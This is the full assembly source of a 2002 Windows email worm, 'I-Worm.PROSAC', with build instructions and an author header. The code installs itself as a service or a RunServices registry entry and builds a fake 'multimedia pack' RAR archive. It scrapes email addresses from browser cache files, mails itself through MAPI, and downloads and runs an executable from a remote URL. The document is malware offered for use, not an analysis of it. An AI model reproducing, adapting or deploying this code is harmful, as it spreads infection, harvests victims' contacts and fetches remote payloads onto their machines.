I-Worm.PROSAC by Radix16/Whackerz
; ------------------------ ; ; This is worm spreading attached to Email messages. ; First execute put up the message : ; ; ---------------------------------x ; |Prosac Installation | ; |--------------------------------| ; | | ; |Complete! Please restart system.| ; | __ | ; | |OK| | ; | -- | ; ---------------------------------- ; ; Win9x/ME Registry key: ; -------- ; SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices ; ; Worm run as Service process. ; ; Win2k/XP Create service ; -------- ; thx M$ a AUTO_START_SERVICE ; ; Create RAR archive for email spreading. ; -------------------------------------- ; RAR > ; readme.txt ; setup.exe ; install.pak ; service.pak ; modem.pak ; sound.pak ; graphic.pak ; ; Find archive in Windows directory \prosac.rar ; ; Email spread used MAPI function ; ------------------------------- ; ; In the Outlook Express 6.0 not used Kill trix.(bug) ; Email adress search in the Temporary Internet File (*.htm*) ; ; IE6 safeguard: ; ------------- ; ; --------------------------------------------- ; |Outlook Express |?|X| ; |-------------------------------------------- ; | Programme with ............. | ; | !!! | ; | ! | ; | To: [email address] | ; | | ; | Subject: [TEXT] | ; | | ; | You want this message send ? | ; | | ; | SEND NO SEND | ; --------------------------------------------- ; ; E-MAIL: ; ------ ; ; Subject: PROSAC ; ; Text mail: Attach file is new multimedia pack ; for Win9x/ME/NT/2000 and some WinXP! ; ; (c) Copyright PROSAC SW ; ; Attach file: prosac.rar ; ; ; Download SMTP sender ; ------------------- ; Worm connect to my website and download binary file in > System ; directory \ sender.exe and execute it. ; ; http://www.volny.cz/radix16/prosac/sender.EXE ; ; How to compile ; -------------- ; ; tasm32 -ml -m9 Prosac.asm ; tlink32 -Tpe -aa -c Prosac.obj,,,import32.lib,prosac.def ; pewrsec Prosac.exe ; ; ------------------------- prosac.def --------------- ; ; IMPORTS ; ; WININET.InternetGetConnectedState ; WININET.InternetOpenA ; WININET.InternetOpenUrlA ; WININET.InternetReadFile ; WININET.InternetCloseHandle ; ; ; ------------------------- prosac.def --------------- ; ; contact me ; ---------- ; ; radix16@atlas.cz ; radix16.cjb.net ; ; close ; ----- ; 7/6/2002 .386 jumps locals .Model Flat,STDCALL extrn GetModuleHandleA :PROC extrn ExitProcess :PROC extrn CreateThread :PROC extrn GetVersion :PROC extrn Sleep :PROC extrn GetModuleFileNameA :PROC extrn SetFilePointer :PROC extrn SetCurrentDirectoryA :PROC extrn GetSystemDirectoryA :PROC extrn GetProcAddress :PROC extrn GetWindowsDirectoryA :PROC extrn RegCreateKeyExA :PROC extrn RegOpenKeyExA :PROC extrn RegQueryValueExA :PROC extrn RegCloseKey :PROC extrn RegSetValueExA :PROC extrn CopyFileA :PROC extrn GetSystemTime :PROC extrn WriteFile :PROC extrn ReadFile :PROC extrn GetFileSize :PROC extrn lstrcat :PROC extrn FindFirstFileA :PROC extrn FindClose :PROC extrn FindNextFileA :PROC extrn CreateFileA :PROC extrn CloseHandle :PROC extrn UnmapViewOfFile :PROC extrn CreateFileMappingA :PROC extrn CreateFileA :PROC extrn MapViewOfFile :PROC extrn CreateMutexA :PROC extrn OpenMutexA :PROC extrn CreateServiceA :PROC extrn StartServiceCtrlDispatcherA: PROC extrn RegisterServiceCtrlHandlerA: PROC extrn OpenSCManagerA :PROC extrn OpenServiceA :PROC extrn CloseServiceHandle :PROC extrn SetServiceStatus :PROC extrn DeleteService :PROC extrn LoadLibraryA :PROC extrn FindWindowA :PROC extrn PostMessageA :PROC extrn WinExec :PROC extrn MessageBoxA :PROC extrn MAPILogon :PROC extrn MAPILogoff :PROC extrn MAPISendMail :PROC extrn InternetGetConnectedState: PROC extrn InternetOpenA :PROC extrn InternetCloseHandle :PROC extrn InternetOpenUrlA :PROC extrn InternetReadFile :PROC include useful.inc include win32api.inc HeaderSize equ end_rar - RARHeader SOCK_STREAM equ 1 AF_INET equ 2 KEY_ALL_ACCESS equ 0F003FH max_path equ 256 file_size equ 12800 .data _name db 'I-Worm.Prosac by Radix16',0 _text db 'hi, your PC is future for virus',0 file_name db '\tapi32.exe',0 rar_name db '\prosac.rar',0 dwnl_file db '\sender.exe',0 service_name db 'tapi32ms',0 k32 db 'kernel32.dll',0 readme_txt: db ' -----------------------------------',0dh,0ah db ' Welcome to PROSAC (multimedia pack)',0dh,0ah db ' -----------------------------------',0dh,0ah db 0dh,0ah db ' (c) Copyright PROSAC',0dh,0ah db 0dh,0ah db ' files',0dh,0ah db ' -----',0dh,0ah db 0dh,0ah db ' readme.txt',0dh,0ah db ' setup.exe',0dh,0ah db ' install.pak',0dh,0ah db ' service.pak',0dh,0ah db ' modem.pak',0dh,0ah db ' sound.pak',0dh,0ah db ' graphic.pak',0dh,0ah db 0dh,0ah db ' install',0dh,0ah db ' -------',0dh,0ah db 0dh,0ah db ' 1) Run setup.exe',0dh,0ah db ' 2) Reboot computer',0dh,0ah db 0dh,0ah db ' close',0dh,0ah db ' -----',0dh,0ah db ' Effect is,',0dh,0ah db ' corect modem, sound and graphic bugs in (Win9X/ME/NT/2000/XP)',0dh,0ah db 0dh,0ah db ' Good luck.',0dh,0ah size_readme_txt = $ - readme_txt others_file: db 'setup.exe',0 db 'install.pak',0 db 'service.pak',0 db 'modem.pak',0 db 'sound.pak',0 db 'graphic.pak',0 size_file_size = $ - others_file db 0BCh MapiMessage equ $ dd ? dd offset subject dd offset textmail dd ? dd offset date dd ? dd 2 dd offset MsgFrom dd 1 dd offset MsgTo dd 1 dd offset MapiFileDesc MsgFrom equ $ dd ? dd ? dd offset namefrom dd offset mailfrom dd ? dd ? MsgTo equ $ dd ? dd 1 dd offset nameto dd offset email_ads dd ? dd ? MapiFileDesc equ $ dd ? dd ? dd ? dd offset win_dir dd ? dd ? ; MAPI data for send email subject db 'PROSAC',0 date db '21/9/2002',0 namefrom db 'PROSAC SW',0 mailfrom db 'prosac@bugs.com',0 nameto db 'sppl',0 textmail db 'Attach file is new multimedia pack',0dh,0ah db 'for Win9x/ME/NT/2000 and some WinXP!',0dh,0ah db 0dh,0ah db '(c) Copyright PROSAC SW',0 ;********************************** ; RAR DATA HEADER ;********************************** First_pak: db 'Rar!',01ah,07h,00h,0cfh,090h,073h,00h,00h,0dh,00h,00h db 00h,00h,00h,00h,00h RARHeader: RARHeaderCRC dw 0 db 074h dw 8000h dw end_rar - RARHeaderCRC RARCompressed dd 0 RAROriginal dd 0 db 0 RARCrc32 dd 0 db 063h,078h db 031h,024h db 014h db 030h dw end_rar - RARName dd 0 RARName db 'readme.txt',10 dup (00) end_rar: bFailIfExists dd 0 lpThreadId dd 0 lpParameter dd 0 num dd 0 fhandle dd 0 mhandle dd 0 hsocket dd 0 pak_size dd 0 khandle dd 0 shandle dd 0 sehandle dd 0 maphandle dd 0 mapaddress dd 0 h_Key dd 0 FirstRun dd 0 tmp dd 0 ihandle dd 0 MAPISession dd 0 WSADATA struc mVersion dw ? mHighVersion dw ? szDescription db 257 dup (?) szSystemStatus db 129 dup (?) iMaxSockets dw ? iMaxUpdDg dw ? lpVendorInfo dd ? WSADATA ends SOCKADDR: sin_family dw 2 sin_port dw ? sin_addr dd ? sin_zero db 8 dup (?) SOCKADDR_SIZE = $ - SOCKADDR kdata db 260 dup(0) klen dd 260 ktype dd 0 filetim struct FT_dwLowDateT dd ? FT_dwHighDateT dd ? filetim ends w32fd struct FileAttributes dd ? CreationTime filetim ? LastAccessTime filetim ? LastWriteTime filetim ? FileSizeHigh dd ? FileSizeLow dd ? Reserved0 dd ? Reserved1 dd ? FileNameC db max_path DUP (00) AlternateFileN db 13 dup (?) db 3 dup (?) w32fd ends SYSTEMTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wSecond WORD ? wMilliseconds WORD ? SYSTEMTIME ends SERVICE_STATUS struct dd 10h or 20h ;dwServiceType dd 4 ;dwCurrentState dd 0 ;dwControlsAccepted dd 0 ;dwWin32ExitCode dd 0 ;dwServiceSpecificExitCode dd 0 ;dwCheckPoint dd 0 ;dwWaitHint SERVICE_STATUS ends search w32fd ? SystemTime SYSTEMTIME <> wsadata WSADATA <> db 256 dup (0) email_ads db 'test@roller.net',0,40 dup (?) win_dir db 256 dup (?) worm_name db 256 dup (?) data_buffer db 28672 dup (?) .code ;------------------------------------ start virus ------- start: pushad push 8000 call Sleep next: push 0 ; address of module name call GetModuleHandleA mov mhandle,eax push 256 ; size of buffer push offset worm_name ; pointer to buffer push eax ; handle to module to find filename call GetModuleFileNameA call GetVersion call reg_service r_: call init_worm call rar push NULL call $+9 dd 00000000h call InternetGetConnectedState or eax,eax je wait_ call test6x or eax,eax je no_mapi_send_mail call send_mail no_mapi_send_mail: call Download__ wait_: push 120000 call Sleep cmp dword ptr [FirstRun],0FFh jne no_transparent push 0 @pushsz 'Prosac Installation' @pushsz 'Complete! Please restart system.' push 0 call MessageBoxA no_transparent: push 256 push offset win_dir call GetSystemDirectoryA push offset file_name push offset win_dir call lstrcat push 0 push offset win_dir call WinExec popad push 0 call ExitProcess ;------------------------------------ Thread Init------- ; install thread init_worm: push 256 ; size of directory buffer push offset win_dir ; address of buffer for system directory call GetSystemDirectoryA push offset file_name ; pointer to string to add to string1 push offset win_dir ; pointer to buffer for concatenated call lstrcat ; strings push offset search ; Testing Infect push offset win_dir call FindFirstFileA inc eax jne found_file ; found prosac.exe ? mov dword ptr [FirstRun],0FFh ; Flag push bFailIfExists ; flag for operation if file exists push offset win_dir ; pointer to filename to copy push offset worm_name ; pointer to name of an existing file call CopyFileA found_file: call service ret ;------------------------------------ End Thread Init -- ;------------------------------------ Thread Spread ---- ; spread thread ; create rar file, search email in Temporary Internet files send_mail: call __connect test eax,eax jne err_mapi call __send call s_email call __disconnect err_mapi: ret ;------------------------------------ End Thread Spread ---- ;*********************************** ; SEND MAIL ;*********************************** __send: call GetVersion cmp al,5 jne _9x_me db 30h dup (90h) _9x_me: xor eax, eax push eax push eax push offset MapiMessage push eax push dword ptr [MAPISession] call MAPISendMail ret ;*********************************** ; MAPILogon ;*********************************** __connect: xor eax,eax push offset MAPISession push eax push eax push eax push eax push eax call MAPILogon ret ;*********************************** ; MAPILogoff ;*********************************** __disconnect: xor eax,eax push eax push eax push eax push dword ptr [MAPISession] call MAPILogoff ret ;********************************** ; SEARCH email address ;********************************** ; ; !!Spread Thread!! s_email: mov ebx,80000002h call __1__s db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths',0 __1__s: pop edx call proc1 call __2__s db 'Directory',0 __2__s: pop edx call proc2 push offset kdata call SetCurrentDirectoryA push offset search @pushsz '*.*' call FindFirstFileA inc eax je quit_search dec eax mov dword ptr [shandle],eax loop_____: lea edi,[search.FileNameC] cmp byte ptr [edi],'.' je _NextSearchDirec mov ecx,100 s_dot: inc edi cmp byte ptr [edi],'.' je _NextSearchDirec loop s_dot jmp s_html _NextSearchDirec: push offset search push dword ptr [shandle] call FindNextFileA dec eax je loop_____ jmp leave_s s_html: lea edi,[search.FileNameC] push edi call SetCurrentDirectoryA push offset search @pushsz '*.htm*' call FindFirstFileA inc eax je quit_search dec eax mov dword ptr [sehandle],eax try_search: lea edi,[search.FileNameC] xor eax,eax push eax push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push eax push FILE_SHARE_READ push GENERIC_READ push edi call CreateFileA inc eax je next_s dec eax mov dword ptr [fhandle], eax xor eax,eax push eax push eax push eax push PAGE_READONLY push eax push dword ptr [fhandle] call CreateFileMappingA or eax,eax jz e_hanf mov dword ptr [maphandle],eax xor ebx,ebx push ebx push ebx push ebx push FILE_MAP_READ push eax call MapViewOfFile or eax,eax jz e_maph mov dword ptr [mapaddress], eax mov edi, offset email_ads mov esi, eax push NULL push [fhandle] call GetFileSize xchg eax,ecx jecxz u_v_f mov edi,offset email_ads seekit: cmp dword ptr [esi], 'iam"' jnz ckuf cmp dword ptr [esi+4], ":otl" jz librty ckuf: inc esi skream: loop seekit stc jmp u_v_f librty: lea esi,[esi+8] cpmail: lodsb stosb cmp al,'"' jnz cpmail mov byte ptr [edi-1],00h clc push ecx call __send pop ecx jmp seekit u_v_f: push dword ptr [mapaddress] call UnmapViewOfFile e_maph: push dword ptr [maphandle] call CloseHandle e_hanf: push dword ptr [fhandle] call CloseHandle next_s: push offset search push dword ptr [sehandle] call FindNextFileA dec eax je try_search push dword ptr [sehandle] call FindClose quit_search: push offset kdata call SetCurrentDirectoryA jmp _NextSearchDirec leave_s: ret ;********************************** ; SERVICE ;********************************** ; ; SC_MANAGER_CONNECT = 1 Enables connecting to the service control manager ; SC_MANAGER_CREATE_SERVICE = 2 Enables calling of the CreateService function ; ; !!Init Thread!! service: call GetVersion cmp al,5 ; Win2K ? jne win9x push 1 or 2 ; type of access push 0 ; lpDatabaseName push 0 ; lpMachineName call OpenSCManagerA test eax,eax jz win9x xchg eax,edi push 10000h push offset service_name push edi call OpenServiceA xchg eax, ecx jecxz i_service push ecx push ecx call DeleteService call CloseServiceHandle i_service: xor eax,eax push eax ; pointer to password push eax ; name push eax ; pointer to array of dependency names push eax ; pointer to variable to get tag identifier push eax ; pointer to name of load ordering group push offset win_dir ; binary push eax ; severity if service fails to start push 2 ; dwStartType SERVICE_AUTO_START push 10h ; SERVICE_WIN32_OWN_PROCESS push eax ; dwDesiredAccess push offset service_name ; pointer to display name push offset service_name ; pointer to name of service to start push edi ; handle to service control manager database call CreateServiceA test eax,eax je s_e push eax ; handle call CloseServiceHandle s_e: push esi call CloseServiceHandle ret reg_service: call sc_ dd offset service_name dd offset service_start dd 0 dd 0 sc_: call StartServiceCtrlDispatcherA dec eax jne r_ inc eax push 0 call ExitProcess win9x: push offset k32 call GetModuleHandleA @pushsz 'RegisterServiceProcess' push eax call GetProcAddress xchg eax, ecx jecxz ohh_ja push 1 push 0 call ecx ohh_ja: xor eax,eax push offset tmp push offset h_Key push eax push 3 push eax push eax push eax @pushsz 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices' push 80000002h call RegCreateKeyExA push 256 push offset win_dir push 1 push 0 @pushsz 'PROSAC' mov ebx, dword ptr [h_Key] push ebx call RegSetValueExA push ebx call RegCloseKey end_9x_r: ret service_start: pushad push offset end_9x_r ; address of handler function push offset service_name ; address of name of service call RegisterServiceCtrlHandlerA test eax,eax je r_ push eax push offset SERVICE_STATUS push eax call SetServiceStatus call CloseServiceHandle jmp r_ test6x: mov ebx,80000002h call __test61 db 'SOFTWARE\Microsoft\Internet Explorer',0 __test61: pop edx call proc1 call __test62 db 'version',0 __test62: pop edx call proc2 cmp byte ptr [kdata],'6' je no_mapi mov eax,01101001 ret no_mapi: xor eax,eax ret ;********************************** ; CREATE RAR ;********************************** ; ; %windir\prosac.rar ; ; !!Spread Thread!! rar: xor eax,eax push eax push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push eax push FILE_SHARE_READ push GENERIC_READ push offset win_dir call CreateFileA inc eax je fucka dec eax xchg eax,ebx push 0 push offset num push 12800 push offset data_buffer push ebx call ReadFile push ebx ; handle call CloseHandle push 256 push offset win_dir call GetWindowsDirectoryA push offset rar_name ; pointer to string to add to string1 push offset win_dir ; pointer to buffer for concatenated call lstrcat ; strings push offset search push offset win_dir call FindFirstFileA inc eax jne fucka dec eax xor eax,eax push eax push FILE_ATTRIBUTE_NORMAL ; file attributes push CREATE_ALWAYS push eax push FILE_SHARE_READ ; share mode push GENERIC_WRITE ; access (read-write) mode push offset win_dir call CreateFileA inc eax je fucka dec eax mov dword ptr [fhandle],eax mov dword ptr [RARCompressed],size_readme_txt mov dword ptr [RAROriginal],size_readme_txt mov esi,offset readme_txt mov edi,size_readme_txt call CRC32 mov dword ptr [RARCrc32],eax mov esi,offset RARHeader+2 mov edi,HeaderSize-2 call CRC32 mov word ptr [RARHeaderCRC],ax mov esi,offset First_pak mov ecx,end_rar - First_pak call Write_file mov esi,offset readme_txt mov ecx,size_readme_txt call Write_file mov eax,offset RARName mov ebx,offset others_file mov ecx,size_file_size n_file_loop: mov dl,byte ptr [ebx] mov [eax],dl cmp dl,0BCh je end_c_r or dl,dl je set_nf_c inc eax inc ebx loop n_file_loop end_c_r: xor ecx,ecx jmp rar_finisch set_nf_c: push ecx mov edi,ebx push edi xor ebx,ebx add ebx,pak_size mov eax,offset data_buffer add ebx,file_size mov dword ptr [RARCompressed],ebx mov dword ptr [RAROriginal],ebx push eax push ebx next_file: mov esi,eax mov edi,ebx call CRC32 mov dword ptr [RARCrc32],eax mov esi,offset RARHeader+2 mov edi,HeaderSize-2 call CRC32 mov word ptr [RARHeaderCRC],ax mov esi,offset RARHeader mov ecx,HeaderSize call Write_file pop ebx pop eax mov esi,eax mov ecx,ebx call Write_file pop edi mov ebx,edi inc ebx pop ecx mov eax,offset RARName add dword ptr [pak_size],1156 jmp n_file_loop rar_finisch: push dword ptr [fhandle] ; handle call CloseHandle fucka: ret ;////////////// WRITE FILE ///////// ; esi: pointer ; ecx: size ;////////////// Write_file: push 0 ; lpOverlapped push offset num ; lpNumberOfBytesWritten push ecx ; number of bytes to write push esi ; pointer to data to write to file push dword ptr [fhandle] ; handle call WriteFile ret ;////////////// SET FILE POINTER // ; eax: 0 - begin ; 1 - current ; 2 - end ;////////////// _sfpointer: push eax push 0 push 0 push dword ptr [fhandle] call SetFilePointer ret ;********************************** ; CRC32 ;********************************** ; CRC32: cld push ebx mov ecx,-1 mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec di jnz NextByteCRC not edx not ecx pop ebx mov eax,edx rol eax,16 mov ax,cx ret ;********************************** ; READ KEY ;********************************** ; ; Read temporary internet files path for ; !Spread Thread!! proc1: lea eax, dword ptr [offset khandle] push eax push KEY_ALL_ACCESS push 0 push edx push ebx call RegOpenKeyExA ret proc2: lea eax, dword ptr [offset klen] push eax lea eax, dword ptr [offset kdata] push eax lea eax, dword ptr [offset ktype] push eax push 0 push edx mov eax, dword ptr [khandle] push eax call RegQueryValueExA push eax push dword ptr [khandle] call RegCloseKey pop eax ret Download__: pushad push 256 push offset win_dir call GetSystemDirectoryA push offset dwnl_file push offset win_dir call lstrcat xor eax,eax push eax push FILE_ATTRIBUTE_NORMAL push CREATE_ALWAYS push eax push FILE_SHARE_READ push GENERIC_WRITE push offset win_dir call CreateFileA inc eax je cr_err dec eax mov [fhandle],eax xor eax,eax push eax push eax push eax push eax push offset service_name call InternetOpenA test eax,eax je err_IO xchg eax,ebx xor eax,eax push eax push 80000000h push eax push eax @pushsz 'http://www.volny.cz/radix16/prosac/sender.EXE' push ebx call InternetOpenUrlA test eax,eax je err_IOU xchg eax,esi push offset tmp push 28672 push offset data_buffer push esi call InternetReadFile xchg eax,ecx jecxz err_IRF mov esi,offset data_buffer mov ecx,28672 call Write_file err_IRF: push esi call InternetCloseHandle err_IOU: push ebx call InternetCloseHandle err_IO: push dword ptr [fhandle] call CloseHandle push 0 push offset win_dir call WinExec cr_err: popad ret end start